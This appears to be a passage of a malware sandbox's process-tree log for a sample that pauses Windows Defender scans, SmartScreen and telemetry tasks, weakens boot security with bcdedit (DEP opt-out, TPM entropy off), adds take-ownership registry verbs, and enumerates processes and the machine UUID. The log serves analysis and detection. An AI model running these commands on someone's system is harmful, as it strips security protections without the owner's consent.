-
C:\Windows\system32\schtasks.exeschtasks /end /tn "\Microsoft\Windows\PI\Sqm-Tasks"7⤵PID:5156
-
-
C:\Windows\system32\schtasks.exeschtasks /change /tn "\Microsoft\Windows\PI\Sqm-Tasks" /disable7⤵PID:4344
-
-
C:\Windows\system32\schtasks.exeschtasks /end /tn "\Microsoft\Windows\NetTrace\GatherNetworkInfo"7⤵PID:3948
-
-
C:\Windows\system32\schtasks.exeschtasks /change /tn "\Microsoft\Windows\NetTrace\GatherNetworkInfo" /disable7⤵PID:2928
-
-
C:\Windows\system32\schtasks.exeschtasks /end /tn "\Microsoft\Windows\AppID\SmartScreenSpecific"7⤵PID:3168
-
-
C:\Windows\system32\schtasks.exeschtasks /change /tn "\Microsoft\Windows\AppID\SmartScreenSpecific" /disable7⤵PID:2368
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\SettingSync\BackgroundUploadTask" /Disable7⤵PID:1908
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319" /Disable schtasks /Change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64" /Disable7⤵PID:400
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64 Critical" /Disable7⤵PID:5756
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 Critical" /Disable7⤵PID:5676
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\AppID\SmartScreenSpecific" /Disable7⤵PID:5736
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ApplicationData\CleanupTemporaryState" /Disable7⤵PID:5760
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ApplicationData\DsSvcCleanup" /Disable7⤵PID:5340
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Application Experience\AitAgent" /Disable7⤵PID:3692
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" /Disable7⤵PID:1724
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Application Experience\ProgramDataUpdater" /Disable7⤵PID:3008
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Application Experience\StartupAppTask" /Disable7⤵PID:2236
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Autochk\Proxy" /Disable7⤵PID:5788
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\CloudExperienceHost\CreateObjectTask" /Disable7⤵PID:5008
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\Consolidator" /Disable7⤵PID:5344
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask" /Disable7⤵PID:5428
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\UsbCeip" /Disable7⤵PID:5520
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\BthSQM" /Disable7⤵PID:1112
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\HypervisorFlightingTask" /Disable7⤵PID:5692
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Diagnosis\Scheduled" /Disable7⤵PID:5456
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector" /Disable7⤵PID:4804
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\DiskFootprint\Diagnostics" /Disable7⤵PID:5264
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\DiskFootprint\StorageSense" /Disable7⤵PID:5508
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ErrorDetails\EnableErrorDetailsUpdate" /Disable7⤵PID:5356
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Feedback\Siuf\DmClient" /Disable7⤵PID:5656
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Feedback\Siuf\DmClientOnScenarioDownload" /Disable7⤵PID:5184
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\File Classification Infrastructure\Property Definition Sync" /Disable7⤵PID:4048
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Management\Provisioning\Logon" /Disable7⤵PID:4268
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Maintenance\WinSAT" /Disable7⤵PID:5208
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Maps\MapsToastTask" /Disable7⤵PID:1556
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Maps\MapsUpdateTask" /Disable7⤵PID:3124
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser" /Disable7⤵PID:5084
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Multimedia\SystemSoundsService" /Disable7⤵PID:3196
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\NlaSvc\WiFiTask" /Disable7⤵PID:3596
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\NetCfg\BindingWorkItemQueueHandler" /Disable7⤵PID:4904
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\NetTrace\GatherNetworkInfo" /Disable7⤵PID:116
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Offline Files\Background Synchronization" /Disable7⤵PID:2228
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Offline Files\Logon Synchronization" /Disable7⤵PID:2816
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\PI\Sqm-Tasks" /Disable7⤵PID:3784
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Ras\MobilityManager" /Disable7⤵PID:5248
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\RemoteAssistance\RemoteAssistanceTask" /Disable7⤵PID:532
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Servicing\StartComponentCleanup" /Disable7⤵PID:5188
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\SettingSync\BackupTask" /Disable7⤵PID:4584
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\SettingSync\NetworkStateChangeTask" /Disable7⤵PID:932
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyMonitor" /Disable7⤵PID:4740
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyRefresh" /Disable7⤵PID:4480
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\SpacePort\SpaceAgentTask" /Disable7⤵PID:408
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\SpacePort\SpaceManagerTask" /Disable7⤵PID:3144
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Speech\SpeechModelDownloadTask" /Disable7⤵PID:5232
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\User Profile Service\HiveUploadTask" /Disable7⤵PID:5892
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\WCM\WiFiTask" /Disable7⤵PID:5768
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable7⤵PID:5900
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable7⤵PID:5988
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable7⤵PID:2096
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable7⤵PID:5916
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Error Reporting\QueueReporting" /Disable7⤵PID:5972
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStartTypeChange" /Disable7⤵PID:564
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Media Sharing\UpdateLibrary" /Disable7⤵PID:5932
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Wininet\CacheTask" /Disable7⤵PID:6016
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Work Folders\Work Folders Logon Synchronization" /Disable7⤵PID:5952
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Work Folders\Work Folders Maintenance Work" /Disable7⤵PID:5992
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Workplace Join\Automatic-Device-Join" /Disable7⤵PID:5976
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\XblGameSave\XblGameSaveTask" /Disable7⤵PID:6020
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\XblGameSave\XblGameSaveTaskLogon" /Disable7⤵PID:6044
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Driver Easy Scheduled Scan" /Disable7⤵PID:2408
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Office\OfficeTelemetryAgentFallBack2016" /Disable7⤵PID:5472
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Office\OfficeTelemetryAgentLogOn2016" /Disable7⤵PID:5816
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Office\Office ClickToRun Service Monitor" /Disable7⤵PID:6060
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\*\shell\runas" /v "MUIVerb" /t REG_SZ /d "Grant Admin Full Control" /f7⤵
- Modifies registry class
PID:6088
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\*\shell\runas" /v "NoWorkingDirectory" /t REG_SZ /d "" /f7⤵
- Modifies registry class
PID:1408
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\*\shell\runas" /v "icon" /t REG_SZ /d "C:\Windows\system32\imageres.dll ,73" /f7⤵
- Modifies registry class
PID:3096
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\*\shell\runas\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f7⤵
- Modifies registry class
PID:3172
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\*\shell\runas\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f7⤵
- Modifies registry class
PID:6092
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\exefile\shell\runas2" /ve /t REG_SZ /d "Grant Admin Full Control" /f7⤵
- Modifies system executable filetype association
- Modifies registry class
PID:4636
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\exefile\shell\runas2" /v "NoWorkingDirectory" /t REG_SZ /d "" /f7⤵
- Modifies system executable filetype association
PID:1532
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\exefile\shell\runas2" /v "icon" /t REG_SZ /d "C:\Windows\system32\imageres.dll ,73" /f7⤵
- Modifies system executable filetype association
PID:696
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\exefile\shell\runas2\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f7⤵
- Modifies system executable filetype association
- Modifies registry class
PID:1392
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\exefile\shell\runas2\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f7⤵
- Modifies system executable filetype association
- Modifies registry class
PID:1188
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\Directory\shell\runas" /ve /t REG_SZ /d "Grant Admin Full Control" /f7⤵PID:264
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\Directory\shell\runas" /v "NoWorkingDirectory" /t REG_SZ /d "" /f7⤵PID:6108
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\Directory\shell\runas" /v "icon" /t REG_SZ /d "C:\Windows\system32\imageres.dll ,73" /f7⤵PID:3080
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\Directory\shell\runas\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t" /f7⤵PID:1104
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\Directory\shell\runas\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t" /f7⤵
- Modifies registry class
PID:2176
-
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns7⤵
- Gathers network information
PID:4276
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global rss=enable7⤵PID:4864
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global autotuninglevel=normal7⤵PID:5228
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global ecncapability=enabled7⤵PID:3796
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global timestamps=disabled7⤵PID:1240
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global initialrto=20007⤵PID:3068
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global maxsynretransmissions=27⤵PID:5528
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global rsc=disabled7⤵PID:5560
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global nonsackrttresiliency=disabled7⤵PID:5564
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global fastopen=enabled7⤵PID:5516
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global fastopenfallback=enabled7⤵PID:1548
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global hystart=disabled7⤵PID:5440
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global pacingprofile=off7⤵PID:5480
-
-
C:\Windows\system32\bcdedit.exebcdedit /deletevalue useplatformclock7⤵PID:4908
-
-
C:\Windows\system32\bcdedit.exebcdedit /set disabledynamictick yes7⤵PID:2128
-
-
C:\Windows\system32\bcdedit.exebcdedit /set useplatformtick yes7⤵PID:3836
-
-
C:\Windows\system32\bcdedit.exebcdedit /timeout 07⤵PID:1536
-
-
C:\Windows\system32\bcdedit.exebcdedit /set nx optout7⤵PID:2476
-
-
C:\Windows\system32\bcdedit.exebcdedit /set bootux disabled7⤵PID:3492
-
-
C:\Windows\system32\bcdedit.exebcdedit /set bootmenupolicy standard7⤵PID:5672
-
-
C:\Windows\system32\bcdedit.exebcdedit /set hypervisorlaunchtype off7⤵PID:928
-
-
C:\Windows\system32\bcdedit.exebcdedit /set tpmbootentropy ForceDisable7⤵PID:2044
-
-
C:\Windows\system32\bcdedit.exebcdedit /set quietboot yes7⤵PID:2372
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {globalsettings} custom:16000067 true7⤵PID:2212
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {globalsettings} custom:16000069 true7⤵PID:3592
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {globalsettings} custom:16000068 true7⤵PID:5772
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\*\shell\runas" /v "MUIVerb" /t REG_SZ /d "Grant Admin Full Control" /f7⤵
- Modifies registry class
PID:500
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\*\shell\runas" /v "NoWorkingDirectory" /t REG_SZ /d "" /f7⤵
- Modifies registry class
PID:3248
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\*\shell\runas" /v "icon" /t REG_SZ /d "C:\Windows\system32\imageres.dll ,73" /f7⤵
- Modifies registry class
PID:5784
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\*\shell\runas\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f7⤵
- Modifies registry class
PID:1912
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\*\shell\runas\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f7⤵
- Modifies registry class
PID:3880
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\exefile\shell\runas2" /ve /t REG_SZ /d "Grant Admin Full Control" /f7⤵
- Modifies system executable filetype association
- Modifies registry class
PID:2224
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\exefile\shell\runas2" /v "NoWorkingDirectory" /t REG_SZ /d "" /f7⤵
- Modifies system executable filetype association
- Modifies registry class
PID:2248
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\exefile\shell\runas2" /v "icon" /t REG_SZ /d "C:\Windows\system32\imageres.dll ,73" /f7⤵
- Modifies system executable filetype association
- Modifies registry class
PID:5276
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\exefile\shell\runas2\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f7⤵
- Modifies system executable filetype association
- Modifies registry class
PID:4576
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\exefile\shell\runas2\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f7⤵
- Modifies system executable filetype association
- Modifies registry class
PID:5336
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\Directory\shell\runas" /ve /t REG_SZ /d "Grant Admin Full Control" /f7⤵
- Modifies registry class
PID:5644
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\Directory\shell\runas" /v "NoWorkingDirectory" /t REG_SZ /d "" /f7⤵
- Modifies registry class
PID:5600
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\Directory\shell\runas" /v "icon" /t REG_SZ /d "C:\Windows\system32\imageres.dll ,73" /f7⤵
- Modifies registry class
PID:5556
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\Directory\shell\runas\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t" /f7⤵
- Modifies registry class
PID:5716
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\Directory\shell\runas\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t" /f7⤵
- Modifies registry class
PID:5684
-
-
C:\Windows\system32\bcdedit.exebcdedit /set tscsyncpolicy Enhanced7⤵PID:5352
-
-
C:\Windows\system32\netsh.exenetsh interface teredo set state disabled7⤵PID:5328
-
-
C:\Windows\system32\netsh.exenetsh interface 6to4 set state disabled7⤵PID:5512
-
-
C:\Windows\system32\netsh.exenetsh winsock reset7⤵PID:5160
-
-
C:\Windows\system32\netsh.exenetsh int isatap set state disable7⤵PID:5700
-
-
C:\Windows\system32\netsh.exenetsh int ip set global taskoffload=disabled7⤵PID:4320
-
-
C:\Windows\system32\netsh.exenetsh int ip set global neighborcachelimit=40967⤵PID:4020
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global timestamps=disabled7⤵PID:4428
-
-
C:\Windows\system32\netsh.exenetsh int tcp set heuristics disabled7⤵PID:2684
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global autotuninglevel=disable7⤵PID:3888
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global chimney=disabled7⤵PID:5324
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global ecncapability=disabled7⤵PID:5268
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global rss=enabled7⤵PID:2216
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global rsc=disabled7⤵PID:5176
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global dca=enabled7⤵PID:3144
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global netdma=enabled7⤵PID:5904
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global nonsackrttresiliency=disabled7⤵PID:5964
-
-
C:\Windows\system32\netsh.exenetsh int tcp set security mpp=disabled7⤵PID:5956
-
-
C:\Windows\system32\netsh.exenetsh int tcp set security profiles=disabled7⤵PID:5996
-
-
C:\Windows\system32\netsh.exenetsh int ip set global icmpredirects=disabled7⤵PID:6016
-
-
C:\Windows\system32\netsh.exenetsh int tcp set security mpp=disabled profiles=disabled7⤵PID:5992
-
-
C:\Windows\system32\netsh.exenetsh int ip set global multicastforwarding=disabled7⤵PID:6000
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell Disable-NetAdapterLso -Name "*"7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5808
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "ForEach($adapter In Get-NetAdapter){Disable-NetAdapterPowerManagement -Name $adapter.Name -ErrorAction SilentlyContinue}"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:4864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "ForEach($adapter In Get-NetAdapter){Disable-NetAdapterLso -Name $adapter.Name -ErrorAction SilentlyContinue}"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:1576
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "EnableICMPRedirect" /t REG_DWORD /d "1" /f7⤵PID:4860
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "EnablePMTUDiscovery" /t REG_DWORD /d "1" /f7⤵PID:2032
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "Tcp1323Opts" /t REG_DWORD /d "0" /f7⤵PID:1548
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "TcpMaxDupAcks" /t REG_DWORD /d "2" /f7⤵PID:2440
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "TcpTimedWaitDelay" /t REG_DWORD /d "32" /f7⤵PID:3352
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "GlobalMaxTcpWindowSize" /t REG_DWORD /d "8760" /f7⤵PID:5632
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "TcpWindowSize" /t REG_DWORD /d "8760" /f7⤵PID:4696
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "MaxConnectionsPerServer" /t REG_DWORD /d "0" /f7⤵PID:4448
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "MaxUserPort" /t REG_DWORD /d "65534" /f7⤵PID:3644
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "SackOpts" /t REG_DWORD /d "0" /f7⤵PID:4624
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "DefaultTTL" /t REG_DWORD /d "64" /f7⤵PID:3724
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "NetworkThrottlingIndex" /t REG_SZ /d "ffffffff" /f7⤵PID:1096
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:4800
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5200
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵PID:1668
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵
- Suspicious use of AdjustPrivilegeToken
PID:5192
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --mojo-platform-channel-handle=6448 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:81⤵PID:1448
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x30c 0x4c41⤵PID:4376
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of WriteProcessMemory
PID:3704 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x24c,0x7ff9d0222e98,0x7ff9d0222ea4,0x7ff9d0222eb02⤵PID:4928
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2040 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:22⤵PID:1664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2248 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:32⤵PID:4648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=2680 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:82⤵PID:1088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4380 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:82⤵PID:4620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4380 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:82⤵PID:3808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4428 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:12⤵PID:1048
-
-
